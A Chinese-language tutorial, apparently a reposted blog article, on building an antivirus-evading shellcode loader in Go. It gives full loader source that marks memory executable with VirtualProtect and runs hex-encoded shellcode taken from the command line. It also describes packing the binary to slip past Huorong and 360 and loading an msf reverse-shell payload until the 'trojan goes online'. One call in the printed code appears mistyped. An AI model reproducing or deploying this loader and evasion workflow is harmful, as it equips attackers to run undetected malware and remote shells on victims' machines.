本文作者:zedxx10师傅 01免杀编写说明
- 参考自己公司大佬写的go木马中的内存保护
- 必须对Windows一些重要dll 和 go语言的指针有所了解(重 要 ! )
- 思路:还是和我之前的文章一样采用分离式加载免杀
02shellcode加载器
shellcode加载器的编写结构:
1. 定义一个接收函数
2. 将你的shellcode放入你的刚才定义的接收函数
3. 解密shellcode
4. 加载运行
03shellcode实现 讲 解
1. go语言编写的基本原则
go语言必要的 package main以及func main 主函数
代码语言:javascript复制package main
func main(){
}
基本的go结构:所有的函数都从main函数开始加载,如果没有放入函数,则不会执行该函数。
你创建的函数必须写在main函数之上
在主函数中加入Run函数(待会儿我们要创建的),并且该函数需要单独创建一个 这里只是调用:
2. 使用Run函数就得创建一个名为Run的函数,但是在那之前我们要使用一个保护函数待会用于保护我们的shellcode地址:
在这里可以创建VirtualProtect函数用来保护我们的函数,并且去掉一些函数特征。
具体代码如下:
代码语言:javascript复制var procVirtualProtect = syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualProtect") //syscall是调用函数 通过call NewLazyDLL来调取kernel32.dll(及其重要的链接库 几乎所有的木马都会调用这个函数)NewProc是指api NewProc("VirtualProtect")就是获取VirtualProtect这个函数的api
//保护内存函数 去掉特征
func VirtualProtect(a unsafe.Pointer, b uintptr, c uint32, d unsafe.Pointer) { //转换为同一类型的地址 uintptr,uint32
t, _, _ := procVirtualProtect.all(
uintptr(a),
uintptr(b),
uintptr(c),
uintptr(d))
fmt.Print(t)
}
这里我们需要了解几个重要的函数:
syscall这是调用函数的函数;
NewLazyDLL来调取kernel32.dll(极其重要的链接库 几乎所有的木马都会调用这个函数);
NewProc是指api;
NewProc("VirtualProtect")就是获取VirtualProtect这个函数的api;
有兴趣的可以参考《恶意代码分析》这本书:
3. 将你保护代码放入你的定义函数之中
这里涉及go语言指针,简单的说一下指针,可能讲的会有些模糊。
指针是一个地址传递的,地址传递会发生内存地址的改变。
但是这个和值传递不同有所不同。
其中指针表示: *一级指针 **二级指针
代码语言:javascript复制func Run(sc []byte) {
//定义函数
f := func() {}
var old uint32
//一级指针的值为f的地址
//unsafe.Pointer(*(**uintptr)(unsafe.Pointer(&f))) 将&f转换为1级指针的地址 unsafe.Sizeof(uinpter(0))保护的参数为0 unint32(0x40)flNewProtect,内存新的属性类型,设置为PAGE_EXECUTE_READWRITE(0x40)时该内存页为可读可写可执行
VirtualProtect(unsafe.Pointer(*(**uintptr)(unsafe.Pointer(&f))), unsafe.Sizeof(uintptr(0)), uint32(0x40), unsafe.Pointer(&old))
//将shellcode 放入函数中 &sc为shellcode的地址 **(**uintptr)(unsafe.Pointer(&f))就是将shellcode的地址赋值给了&f的地址
**(**uintptr)(unsafe.Pointer(&f)) = *(*uintptr)(unsafe.Pointer(&sc))
var orgshellcode uint32
//shellcode地址
VirtualProtect(unsafe.Pointer(*(*uintptr)(unsafe.Pointer(&sc))), uintptr(len(sc)), uint32(0x40), unsafe.Pointer(&orgshellcode))
f() //这里调用f函数 f的地址通过**(**uintptr)(unsafe.Pointer(&f)) = *(*uintptr)(unsafe.Pointer(&sc))被更改为shellcode的地址 然后VirtualProtect(unsafe.Pointer(*(*uintptr)(unsafe.Pointer(&sc))),uintptr(len(sc)),uint32(0x40),unsafe.Pointer(&orgshellcode))保护了shellcode的内存地址
}
在这里对下面的代码进行解读:
代码语言:javascript复制VirtualProtect(unsafe.Pointer(*(**uintptr)(unsafe.Pointer(&f))), unsafe.Sizeof(uintptr(0)), uint32(0x40), unsafe.Pointer(&old))
代码语言:javascript复制解读:
unsafe.Pointer(*(**uintptr)(unsafe.Pointer(&f))) 将&f转换为1级指针的地址
unsafe.Sizeof(uinpter(0))保护的参数设置为0
unint32(0x40)flNewProtect是内存新的属性类型,将PAGE_EXECUTE_READWRITE设置为(0x40)时该内存页为可读可写可执行并且是最大权限
VirtualProtect 函数的意思:
继续:
代码语言:javascript复制**(**uintptr)(unsafe.Pointer(&f)) = *(*uintptr)(unsafe.Pointer(&sc))
将shellcode放入函数中,&sc为shellcode的内存地址;这里的目的就是将shellcode的地址赋值给了&f的地址。
通俗的讲就是:
以前shellcode的地址是&sc 现在变成&f ,而&f的地址是进行了内存保护的,等同于shellcode也被保护了。
shellcode的地址
代码语言:javascript复制VirtualProtect(unsafe.Pointer(*(*uintptr)(unsafe.Pointer(&sc))), uintptr(len(sc)), uint32(0x40), unsafe.Pointer(&orgshellcode))
4. 最后一步,调用f函数:
代码语言:javascript复制这里调用f函数
f的地址通过**(**uintptr)(unsafe.Pointer(&f)) = *(*uintptr)(unsafe.Pointer(&sc))被更改为shellcode的地址
然后VirtualProtect(unsafe.Pointer(*(*uintptr)(unsafe.Pointer(&sc))),uintptr(len(sc)),uint32(0x40),unsafe.Pointer(&orgshellcode))保护了shellcode的内存地址
04完整shellcode代码
完整代码如下:
代码语言:javascript复制package main
import (
"encoding/hex"
"fmt"
"os"
"syscall"
"unsafe"
)
var procVirtualProtect = syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualProtect") //syscall是调用函数 通过call NewLazyDLL来调取kernel32.dll(及其重要的链接库 几乎所有的木马都会调用这个函数)NewProc是指api NewProc("VirtualProtect")就是获取VirtualProtect这个函数的api
//保护内存函数 去掉特征
func VirtualProtect(a unsafe.Pointer, b uintptr, c uint32, d unsafe.Pointer) { //转换为同一类型的地址 uintptr,uint32
t, _, _ := procVirtualProtect.all(
uintptr(a),
uintptr(b),
uintptr(c),
uintptr(d))
fmt.Print(t)
}
func Run(sc []byte) {
//定义函数
f := func() {}
var old uint32
//一级指针的值为f的地址
//unsafe.Pointer(*(**uintptr)(unsafe.Pointer(&f))) 将&f转换为1级指针的地址 unsafe.Sizeof(uinpter(0))保护的参数为0 unint32(0x40)flNewProtect,内存新的属性类型,设置为PAGE_EXECUTE_READWRITE(0x40)时该内存页为可读可写可执行
VirtualProtect(unsafe.Pointer(*(**uintptr)(unsafe.Pointer(&f))), unsafe.Sizeof(uintptr(0)), uint32(0x40), unsafe.Pointer(&old))
//将shellcode 放入函数中 &sc为shellcode的地址 **(**uintptr)(unsafe.Pointer(&f))就是将shellcode的地址赋值给了&f的地址
**(**uintptr)(unsafe.Pointer(&f)) = *(*uintptr)(unsafe.Pointer(&sc))
var orgshellcode uint32
//shellcode地址
VirtualProtect(unsafe.Pointer(*(*uintptr)(unsafe.Pointer(&sc))), uintptr(len(sc)), uint32(0x40), unsafe.Pointer(&orgshellcode))
f() //这里调用f函数 f的地址通过**(**uintptr)(unsafe.Pointer(&f)) = *(*uintptr)(unsafe.Pointer(&sc))被更改为shellcode的地址 然后VirtualProtect(unsafe.Pointer(*(*uintptr)(unsafe.Pointer(&sc))),uintptr(len(sc)),uint32(0x40),unsafe.Pointer(&orgshellcode))保护了shellcode的内存地址
}
func main() {
//解密
x, _ := hex.DecodeString(os.Args[1])
Run(x)
}
其中:import是自动导入,不需要手动输入
以上完成了所有的代码,由于go语言无法直接执行,我们需要进行编译,编译方法如下:
找到你的go语言所在路径 cmd 使用
代码语言:javascript复制go build main.go
此时会编译生成一个main.exe (火绒会报毒 )
05加 壳 免 杀
免杀还是采用加壳,upx可以使用但需要抹除特征码(对汇编不好的师傅不太友好,而且容易出问题)。
这里还是采用 safe的壳:
用法很简单:
将你的exe 拖入之后就可以了 (这里选择默认加壳模式就行了,当然如果懂汇编的师傅可以尝试一下其它的选项)
免杀效果:可过火绒和360。
06msf配合免杀演示
1. msf 生成木马
其中,LHOST、 LPORT 根据自己的情况设置。
2.查看生成的木马:
代码语言:javascript复制cat rev.hex
3.创建监听
4.加载你的shellcode
找到你加壳后的exe,在 cmd中运行:
代码语言:javascript复制main_se.exe rev.hex的文件内容
此时木马上线成功
07 总 结
本次的内容,对于不懂汇编或者go语言的师傅会理解比较困难。我也尽力通俗的进行了描述, 如有不便请多担待,当然在这里生成的木马还是有点大,请师傅们理解。
08 tips
以上文章为zedxx10师傅所写,感谢zedxx10师傅的技术分享。